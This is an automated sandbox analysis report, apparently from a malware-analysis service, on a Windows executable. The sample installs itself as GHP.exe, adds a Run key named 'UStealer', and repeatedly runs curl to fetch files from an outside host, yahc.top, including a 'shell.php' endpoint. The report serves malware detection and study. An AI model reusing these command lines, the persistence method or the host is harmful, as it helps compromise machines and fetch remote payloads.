Analysis
-
max time kernel
150s -
max time network
122s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
10/05/2024, 14:25
Behavioral task
behavioral1
Sample
1606252f3bc6f67e9d95d1dddb3aeb14cb096e77b123a3295d5f08bd549ad0a5.exe
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
1606252f3bc6f67e9d95d1dddb3aeb14cb096e77b123a3295d5f08bd549ad0a5.exe
Resource
win10v2004-20240226-en
General
-
Target
1606252f3bc6f67e9d95d1dddb3aeb14cb096e77b123a3295d5f08bd549ad0a5.exe
-
Size
769KB
-
MD5
6f72f203b43cd72f7313c1a51a8f8ac5
-
SHA1
29dbbe2c8190efe5d5f48405522df034314a737b
-
SHA256
1606252f3bc6f67e9d95d1dddb3aeb14cb096e77b123a3295d5f08bd549ad0a5
-
SHA512
f15069cbaa27b863778f2b75aade169b2caffc979b4ce32a3e48dcc2cf1c608737b5820b874584c6f9d4c269d36999fb8bbd55ea6da463e2e62c3a75bd2fb8f2
-
SSDEEP
12288:rQOIre0SqH9a4XS+g7PwYGxPJewxBBcxKhKP9fc8hfcV48oSfLXrWNy6jJzc4IVq:rRIreHo7XS+VYGjc3h3VuQ5bl2iV
Malware Config
Signatures
-
Executes dropped EXE 1 IoCs
pid Process 2564 GHP.exe -
Loads dropped DLL 2 IoCs
pid Process 2460 cmd.exe 2460 cmd.exe -
resource yara_rule behavioral1/memory/612-0-0x0000000000400000-0x00000000004E1000-memory.dmp upx behavioral1/files/0x000900000001441e-3.dat upx behavioral1/memory/612-8-0x0000000000400000-0x00000000004E1000-memory.dmp upx behavioral1/memory/2564-9-0x0000000000400000-0x00000000004E1000-memory.dmp upx -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\UStealer = "C:\\Windows\\ghp\\GHP.exe" GHP.exe -
Drops file in Windows directory 4 IoCs
description ioc Process File opened for modification C:\Windows\ghp\GHP.exe cmd.exe File opened for modification C:\Windows\ghp\log\log.gh GHP.exe File opened for modification C:\Windows\ghp\log\log.gh 1606252f3bc6f67e9d95d1dddb3aeb14cb096e77b123a3295d5f08bd549ad0a5.exe File created C:\Windows\ghp\GHP.exe cmd.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 612 wrote to memory of 2212 612 1606252f3bc6f67e9d95d1dddb3aeb14cb096e77b123a3295d5f08bd549ad0a5.exe 29 PID 612 wrote to memory of 2212 612 1606252f3bc6f67e9d95d1dddb3aeb14cb096e77b123a3295d5f08bd549ad0a5.exe 29 PID 612 wrote to memory of 2212 612 1606252f3bc6f67e9d95d1dddb3aeb14cb096e77b123a3295d5f08bd549ad0a5.exe 29 PID 612 wrote to memory of 2212 612 1606252f3bc6f67e9d95d1dddb3aeb14cb096e77b123a3295d5f08bd549ad0a5.exe 29 PID 612 wrote to memory of 2064 612 1606252f3bc6f67e9d95d1dddb3aeb14cb096e77b123a3295d5f08bd549ad0a5.exe 30 PID 612 wrote to memory of 2064 612 1606252f3bc6f67e9d95d1dddb3aeb14cb096e77b123a3295d5f08bd549ad0a5.exe 30 PID 612 wrote to memory of 2064 612 1606252f3bc6f67e9d95d1dddb3aeb14cb096e77b123a3295d5f08bd549ad0a5.exe 30 PID 612 wrote to memory of 2064 612 1606252f3bc6f67e9d95d1dddb3aeb14cb096e77b123a3295d5f08bd549ad0a5.exe 30 PID 612 wrote to memory of 1724 612 1606252f3bc6f67e9d95d1dddb3aeb14cb096e77b123a3295d5f08bd549ad0a5.exe 31 PID 612 wrote to memory of 1724 612 1606252f3bc6f67e9d95d1dddb3aeb14cb096e77b123a3295d5f08bd549ad0a5.exe 31 PID 612 wrote to memory of 1724 612 1606252f3bc6f67e9d95d1dddb3aeb14cb096e77b123a3295d5f08bd549ad0a5.exe 31 PID 612 wrote to memory of 1724 612 1606252f3bc6f67e9d95d1dddb3aeb14cb096e77b123a3295d5f08bd549ad0a5.exe 31 PID 612 wrote to memory of 1100 612 1606252f3bc6f67e9d95d1dddb3aeb14cb096e77b123a3295d5f08bd549ad0a5.exe 32 PID 612 wrote to memory of 1100 612 1606252f3bc6f67e9d95d1dddb3aeb14cb096e77b123a3295d5f08bd549ad0a5.exe 32 PID 612 wrote to memory of 1100 612 1606252f3bc6f67e9d95d1dddb3aeb14cb096e77b123a3295d5f08bd549ad0a5.exe 32 PID 612 wrote to memory of 1100 612 1606252f3bc6f67e9d95d1dddb3aeb14cb096e77b123a3295d5f08bd549ad0a5.exe 32 PID 612 wrote to memory of 2460 612 1606252f3bc6f67e9d95d1dddb3aeb14cb096e77b123a3295d5f08bd549ad0a5.exe 33 PID 612 wrote to memory of 2460 612 1606252f3bc6f67e9d95d1dddb3aeb14cb096e77b123a3295d5f08bd549ad0a5.exe 33 PID 612 wrote to memory of 2460 612 1606252f3bc6f67e9d95d1dddb3aeb14cb096e77b123a3295d5f08bd549ad0a5.exe 33 PID 612 wrote to memory of 2460 612 1606252f3bc6f67e9d95d1dddb3aeb14cb096e77b123a3295d5f08bd549ad0a5.exe 33 PID 2460 wrote to memory of 2564 2460 cmd.exe 34 PID 2460 wrote to memory of 2564 2460 cmd.exe 34 PID 2460 wrote to memory of 2564 2460 cmd.exe 34 PID 2460 wrote to memory of 2564 2460 cmd.exe 34 PID 2564 wrote to memory of 2900 2564 GHP.exe 36 PID 2564 wrote to memory of 2900 2564 GHP.exe 36 PID 2564 wrote to memory of 2900 2564 GHP.exe 36 PID 2564 wrote to memory of 2900 2564 GHP.exe 36 PID 2564 wrote to memory of 2856 2564 GHP.exe 37 PID 2564 wrote to memory of 2856 2564 GHP.exe 37 PID 2564 wrote to memory of 2856 2564 GHP.exe 37 PID 2564 wrote to memory of 2856 2564 GHP.exe 37 PID 2564 wrote to memory of 1036 2564 GHP.exe 38 PID 2564 wrote to memory of 1036 2564 GHP.exe 38 PID 2564 wrote to memory of 1036 2564 GHP.exe 38 PID 2564 wrote to memory of 1036 2564 GHP.exe 38 PID 2564 wrote to memory of 2516 2564 GHP.exe 39 PID 2564 wrote to memory of 2516 2564 GHP.exe 39 PID 2564 wrote to memory of 2516 2564 GHP.exe 39 PID 2564 wrote to memory of 2516 2564 GHP.exe 39 PID 2564 wrote to memory of 2524 2564 GHP.exe 40 PID 2564 wrote to memory of 2524 2564 GHP.exe 40 PID 2564 wrote to memory of 2524 2564 GHP.exe 40 PID 2564 wrote to memory of 2524 2564 GHP.exe 40 PID 2564 wrote to memory of 2580 2564 GHP.exe 41 PID 2564 wrote to memory of 2580 2564 GHP.exe 41 PID 2564 wrote to memory of 2580 2564 GHP.exe 41 PID 2564 wrote to memory of 2580 2564 GHP.exe 41 PID 2564 wrote to memory of 2584 2564 GHP.exe 42 PID 2564 wrote to memory of 2584 2564 GHP.exe 42 PID 2564 wrote to memory of 2584 2564 GHP.exe 42 PID 2564 wrote to memory of 2584 2564 GHP.exe 42 PID 2564 wrote to memory of 2596 2564 GHP.exe 43 PID 2564 wrote to memory of 2596 2564 GHP.exe 43 PID 2564 wrote to memory of 2596 2564 GHP.exe 43 PID 2564 wrote to memory of 2596 2564 GHP.exe 43 PID 2564 wrote to memory of 2616 2564 GHP.exe 44 PID 2564 wrote to memory of 2616 2564 GHP.exe 44 PID 2564 wrote to memory of 2616 2564 GHP.exe 44 PID 2564 wrote to memory of 2616 2564 GHP.exe 44 PID 2564 wrote to memory of 2716 2564 GHP.exe 45 PID 2564 wrote to memory of 2716 2564 GHP.exe 45 PID 2564 wrote to memory of 2716 2564 GHP.exe 45 PID 2564 wrote to memory of 2716 2564 GHP.exe 45
Processes
-
C:\Users\Admin\AppData\Local\Temp\1606252f3bc6f67e9d95d1dddb3aeb14cb096e77b123a3295d5f08bd549ad0a5.exe"C:\Users\Admin\AppData\Local\Temp\1606252f3bc6f67e9d95d1dddb3aeb14cb096e77b123a3295d5f08bd549ad0a5.exe"1⤵
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
PID:612 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c del C:\Windows\ghp /q2⤵PID:2212
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c rd C:\Windows\ghp /q2⤵PID:2064
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c md C:\Windows\ghp2⤵PID:1724
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c copy C:\Users\Admin\AppData\Local\Temp\1606252f3bc6f67e9d95d1dddb3aeb14cb096e77b123a3295d5f08bd549ad0a5.exe C:\Windows\ghp\GHP.exe2⤵
- Drops file in Windows directory
PID:1100
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c start /min C:\Windows\ghp\GHP.exe2⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2460 -
C:\Windows\ghp\GHP.exeC:\Windows\ghp\GHP.exe3⤵
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
PID:2564 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c curl -o C:\Windows\ghp\pcid.gh http://yahc.top/ghp/reg.php4⤵PID:2900
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c curl -o C:\Windows\ghp\pcid.gh http://yahc.top/ghp/reg.php4⤵PID:2856
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c curl -o C:\Windows\ghp\pcid.gh http://yahc.top/ghp/reg.php4⤵PID:1036
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c curl -o C:\Windows\ghp\pcid.gh http://yahc.top/ghp/reg.php4⤵PID:2516
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c curl -o C:\Windows\ghp\pcid.gh http://yahc.top/ghp/reg.php4⤵PID:2524
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c curl -o C:\Windows\ghp\pcid.gh http://yahc.top/ghp/reg.php4⤵PID:2580
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c curl -o C:\Windows\ghp\pcid.gh http://yahc.top/ghp/reg.php4⤵PID:2584
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c curl -o C:\Windows\ghp\pcid.gh http://yahc.top/ghp/reg.php4⤵PID:2596
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c curl -o C:\Windows\ghp\pcid.gh http://yahc.top/ghp/reg.php4⤵PID:2616
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c curl -o C:\Windows\ghp\pcid.gh http://yahc.top/ghp/reg.php4⤵PID:2716
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c curl -o C:\Windows\ghp\pcid.gh http://yahc.top/ghp/reg.php4⤵PID:2528
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c curl -o C:\Windows\ghp\pcid.gh http://yahc.top/ghp/reg.php4⤵PID:2708
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c curl -o C:\Windows\ghp\pcid.gh http://yahc.top/ghp/reg.php4⤵PID:2520
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c curl -o C:\Windows\ghp\pcid.gh http://yahc.top/ghp/reg.php4⤵PID:2508
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c curl -o C:\Windows\ghp\pcid.gh http://yahc.top/ghp/reg.php4⤵PID:1892
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c curl -o C:\Windows\ghp\pcid.gh http://yahc.top/ghp/reg.php4⤵PID:2704
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c curl -o C:\Windows\ghp\pcid.gh http://yahc.top/ghp/reg.php4⤵PID:2536
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c curl -o C:\Windows\ghp\pcid.gh http://yahc.top/ghp/reg.php4⤵PID:3028
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c curl -o C:\Windows\ghp\pcid.gh http://yahc.top/ghp/reg.php4⤵PID:2644
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c curl -o C:\Windows\ghp\shell.gh http://yahc.top/ghp/shell.php?pcid=4⤵PID:2672
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c curl -o C:\Windows\ghp\shell.gh http://yahc.top/ghp/shell.php?pcid=4⤵PID:2556
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c curl -o C:\Windows\ghp\shell.gh http://yahc.top/ghp/shell.php?pcid=4⤵PID:2404
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c curl -o C:\Windows\ghp\shell.gh http://yahc.top/ghp/shell.php?pcid=4⤵PID:2812
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c curl -o C:\Windows\ghp\shell.gh http://yahc.top/ghp/shell.php?pcid=4⤵PID:2552
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c curl -o C:\Windows\ghp\shell.gh http://yahc.top/ghp/shell.php?pcid=4⤵PID:2604
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c curl -o C:\Windows\ghp\shell.gh http://yahc.top/ghp/shell.php?pcid=4⤵PID:2544
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c curl -o C:\Windows\ghp\shell.gh http://yahc.top/ghp/shell.php?pcid=4⤵PID:2608
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c curl -o C:\Windows\ghp\shell.gh http://yahc.top/ghp/shell.php?pcid=4⤵PID:2432
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c curl -o C:\Windows\ghp\shell.gh http://yahc.top/ghp/shell.php?pcid=4⤵PID:2372
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c curl -o C:\Windows\ghp\shell.gh http://yahc.top/ghp/shell.php?pcid=4⤵PID:2408
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c curl -o C:\Windows\ghp\shell.gh http://yahc.top/ghp/shell.php?pcid=4⤵PID:2448
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c curl -o C:\Windows\ghp\shell.gh http://yahc.top/ghp/shell.php?pcid=4⤵PID:2868
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c curl -o C:\Windows\ghp\shell.gh http://yahc.top/ghp/shell.php?pcid=4⤵PID:2816
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c curl -o C:\Windows\ghp\shell.gh http://yahc.top/ghp/shell.php?pcid=4⤵PID:2788
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c curl -o C:\Windows\ghp\shell.gh http://yahc.top/ghp/shell.php?pcid=4⤵PID:2960
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c curl -o C:\Windows\ghp\shell.gh http://yahc.top/ghp/shell.php?pcid=4⤵PID:2800
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c curl -o C:\Windows\ghp\shell.gh http://yahc.top/ghp/shell.php?pcid=4⤵PID:472
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c curl -o C:\Windows\ghp\shell.gh http://yahc.top/ghp/shell.php?pcid=4⤵PID:2356
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c curl -o C:\Windows\ghp\shell.gh http://yahc.top/ghp/shell.php?pcid=4⤵PID:1948
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c curl -o C:\Windows\ghp\shell.gh http://yahc.top/ghp/shell.php?pcid=4⤵PID:1008
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c curl -o C:\Windows\ghp\shell.gh http://yahc.top/ghp/shell.php?pcid=4⤵PID:676
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c curl -o C:\Windows\ghp\shell.gh http://yahc.top/ghp/shell.php?pcid=4⤵PID:568
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c curl -o C:\Windows\ghp\shell.gh http://yahc.top/ghp/shell.php?pcid=4⤵PID:1344
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c curl -o C:\Windows\ghp\shell.gh http://yahc.top/ghp/shell.php?pcid=4⤵PID:2296
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c curl -o C:\Windows\ghp\shell.gh http://yahc.top/ghp/shell.php?pcid=4⤵PID:1444
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c curl -o C:\Windows\ghp\shell.gh http://yahc.top/ghp/shell.php?pcid=4⤵PID:1924
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c curl -o C:\Windows\ghp\shell.gh http://yahc.top/ghp/shell.php?pcid=4⤵PID:1928
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c curl -o C:\Windows\ghp\shell.gh http://yahc.top/ghp/shell.php?pcid=4⤵PID:1988
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c curl -o C:\Windows\ghp\shell.gh http://yahc.top/ghp/shell.php?pcid=4⤵PID:1996
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c curl -o C:\Windows\ghp\shell.gh http://yahc.top/ghp/shell.php?pcid=4⤵PID:2312
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c curl -o C:\Windows\ghp\shell.gh http://yahc.top/ghp/shell.php?pcid=4⤵PID:2004
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c curl -o C:\Windows\ghp\shell.gh http://yahc.top/ghp/shell.php?pcid=4⤵PID:1984
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c curl -o C:\Windows\ghp\shell.gh http://yahc.top/ghp/shell.php?pcid=4⤵PID:1368
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c curl -o C:\Windows\ghp\shell.gh http://yahc.top/ghp/shell.php?pcid=4⤵PID:620
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c curl -o C:\Windows\ghp\shell.gh http://yahc.top/ghp/shell.php?pcid=4⤵PID:2336
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c curl -o C:\Windows\ghp\shell.gh http://yahc.top/ghp/shell.php?pcid=4⤵PID:2280
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c curl -o C:\Windows\ghp\shell.gh http://yahc.top/ghp/shell.php?pcid=4⤵PID:1672
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c curl -o C:\Windows\ghp\shell.gh http://yahc.top/ghp/shell.php?pcid=4⤵PID:1520
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c curl -o C:\Windows\ghp\shell.gh http://yahc.top/ghp/shell.php?pcid=4⤵PID:1568
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c curl -o C:\Windows\ghp\shell.gh http://yahc.top/ghp/shell.php?pcid=4⤵PID:1624
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c curl -o C:\Windows\ghp\shell.gh http://yahc.top/ghp/shell.php?pcid=4⤵PID:1576
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c curl -o C:\Windows\ghp\shell.gh http://yahc.top/ghp/shell.php?pcid=4⤵PID:1552
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c curl -o C:\Windows\ghp\shell.gh http://yahc.top/ghp/shell.php?pcid=4⤵PID:1500
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c curl -o C:\Windows\ghp\shell.gh http://yahc.top/ghp/shell.php?pcid=4⤵PID:1732
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c curl -o C:\Windows\ghp\shell.gh http://yahc.top/ghp/shell.php?pcid=4⤵PID:2764
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c curl -o C:\Windows\ghp\shell.gh http://yahc.top/ghp/shell.php?pcid=4⤵PID:2628
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c curl -o C:\Windows\ghp\shell.gh http://yahc.top/ghp/shell.php?pcid=4⤵PID:1132
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c curl -o C:\Windows\ghp\shell.gh http://yahc.top/ghp/shell.php?pcid=4⤵PID:2688
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c curl -o C:\Windows\ghp\shell.gh http://yahc.top/ghp/shell.php?pcid=4⤵PID:824
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c curl -o C:\Windows\ghp\shell.gh http://yahc.top/ghp/shell.php?pcid=4⤵PID:2240
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c curl -o C:\Windows\ghp\shell.gh http://yahc.top/ghp/shell.php?pcid=4⤵PID:2968
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c curl -o C:\Windows\ghp\shell.gh http://yahc.top/ghp/shell.php?pcid=4⤵PID:3008
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c curl -o C:\Windows\ghp\shell.gh http://yahc.top/ghp/shell.php?pcid=4⤵PID:2252
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c curl -o C:\Windows\ghp\shell.gh http://yahc.top/ghp/shell.php?pcid=4⤵PID:2256
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c curl -o C:\Windows\ghp\shell.gh http://yahc.top/ghp/shell.php?pcid=4⤵PID:2228
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c curl -o C:\Windows\ghp\shell.gh http://yahc.top/ghp/shell.php?pcid=4⤵PID:2988
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c curl -o C:\Windows\ghp\shell.gh http://yahc.top/ghp/shell.php?pcid=4⤵PID:2116
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c curl -o C:\Windows\ghp\shell.gh http://yahc.top/ghp/shell.php?pcid=4⤵PID:2568
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c curl -o C:\Windows\ghp\shell.gh http://yahc.top/ghp/shell.php?pcid=4⤵PID:2872
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c curl -o C:\Windows\ghp\shell.gh http://yahc.top/ghp/shell.php?pcid=4⤵PID:2728
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c curl -o C:\Windows\ghp\shell.gh http://yahc.top/ghp/shell.php?pcid=4⤵PID:2104
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c curl -o C:\Windows\ghp\shell.gh http://yahc.top/ghp/shell.php?pcid=4⤵PID:2732
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c curl -o C:\Windows\ghp\shell.gh http://yahc.top/ghp/shell.php?pcid=4⤵PID:1268
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c curl -o C:\Windows\ghp\shell.gh http://yahc.top/ghp/shell.php?pcid=4⤵PID:2012
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c curl -o C:\Windows\ghp\shell.gh http://yahc.top/ghp/shell.php?pcid=4⤵PID:872
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c curl -o C:\Windows\ghp\shell.gh http://yahc.top/ghp/shell.php?pcid=4⤵PID:364
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c curl -o C:\Windows\ghp\shell.gh http://yahc.top/ghp/shell.php?pcid=4⤵PID:1836
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c curl -o C:\Windows\ghp\shell.gh http://yahc.top/ghp/shell.php?pcid=4⤵PID:1564
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c curl -o C:\Windows\ghp\shell.gh http://yahc.top/ghp/shell.php?pcid=4⤵PID:932
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c curl -o C:\Windows\ghp\shell.gh http://yahc.top/ghp/shell.php?pcid=4⤵PID:964
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c curl -o C:\Windows\ghp\shell.gh http://yahc.top/ghp/shell.php?pcid=4⤵PID:940
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c curl -o C:\Windows\ghp\shell.gh http://yahc.top/ghp/shell.php?pcid=4⤵PID:1608
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c curl -o C:\Windows\ghp\shell.gh http://yahc.top/ghp/shell.php?pcid=4⤵PID:1476
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c curl -o C:\Windows\ghp\shell.gh http://yahc.top/ghp/shell.php?pcid=4⤵PID:1648
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c curl -o C:\Windows\ghp\shell.gh http://yahc.top/ghp/shell.php?pcid=4⤵PID:1656
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c curl -o C:\Windows\ghp\shell.gh http://yahc.top/ghp/shell.php?pcid=4⤵PID:3024
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c curl -o C:\Windows\ghp\shell.gh http://yahc.top/ghp/shell.php?pcid=4⤵PID:1120
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c curl -o C:\Windows\ghp\shell.gh http://yahc.top/ghp/shell.php?pcid=4⤵PID:1044
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c curl -o C:\Windows\ghp\shell.gh http://yahc.top/ghp/shell.php?pcid=4⤵PID:1468
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c curl -o C:\Windows\ghp\shell.gh http://yahc.top/ghp/shell.php?pcid=4⤵PID:3052
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c curl -o C:\Windows\ghp\shell.gh http://yahc.top/ghp/shell.php?pcid=4⤵PID:3012
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c curl -o C:\Windows\ghp\shell.gh http://yahc.top/ghp/shell.php?pcid=4⤵PID:2892
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c curl -o C:\Windows\ghp\shell.gh http://yahc.top/ghp/shell.php?pcid=4⤵PID:2772
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c curl -o C:\Windows\ghp\shell.gh http://yahc.top/ghp/shell.php?pcid=4⤵PID:2760
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c curl -o C:\Windows\ghp\shell.gh http://yahc.top/ghp/shell.php?pcid=4⤵PID:2828
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c curl -o C:\Windows\ghp\shell.gh http://yahc.top/ghp/shell.php?pcid=4⤵PID:3048
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c curl -o C:\Windows\ghp\shell.gh http://yahc.top/ghp/shell.php?pcid=4⤵PID:2712
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c curl -o C:\Windows\ghp\shell.gh http://yahc.top/ghp/shell.php?pcid=4⤵PID:2748
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c curl -o C:\Windows\ghp\shell.gh http://yahc.top/ghp/shell.php?pcid=4⤵PID:1004
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c curl -o C:\Windows\ghp\shell.gh http://yahc.top/ghp/shell.php?pcid=4⤵PID:2172
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c curl -o C:\Windows\ghp\shell.gh http://yahc.top/ghp/shell.php?pcid=4⤵PID:1940
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c curl -o C:\Windows\ghp\shell.gh http://yahc.top/ghp/shell.php?pcid=4⤵PID:1096
-
-
